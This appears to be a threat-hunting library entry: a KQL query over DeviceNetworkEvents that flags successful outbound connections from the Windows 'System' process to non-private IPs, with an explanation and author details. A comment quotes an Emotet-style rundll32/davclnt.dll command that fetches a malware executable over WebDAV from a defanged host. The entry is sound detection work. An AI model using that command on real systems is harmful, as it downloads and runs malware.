Query Details
System Process Net Cons
Query
// System creating network connections could be many things // A common TTP associated with this traffic is exploiting WebDAV to download malware // emotet example: // rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 127.0.0.1 hxxp://127.0.0[.]1/$/users/public/malware[.]exe DeviceNetworkEvents | where InitiatingProcessFileName =~ "System" | where ActionType == "ConnectionSuccess" // exclude local IPs | where not(ipv4_is_private(RemoteIP)) // ABC private ranges | where RemoteIP !startswith "169.254." // DHCP failed, default link-local | where RemoteIP !startswith "127." // loopback | where RemoteIP != "::1" // loopback // other exclusions //| where RemoteIP !startswith "X.X." // Your org's public IPs
Explanation
This query is looking for network connections created by the system. It filters out connections to local IP addresses and excludes certain IP ranges. It also excludes connections to the loopback address and a specific IP address. Additionally, it has a commented out line that can be used to exclude connections to your organization's public IP addresses.
Details
C.J. May
Released: May 16, 2023
Tables
DeviceNetworkEvents
Keywords
DeviceNetworkEvents
Operators
where=~==notipv4_is_private!startswith!=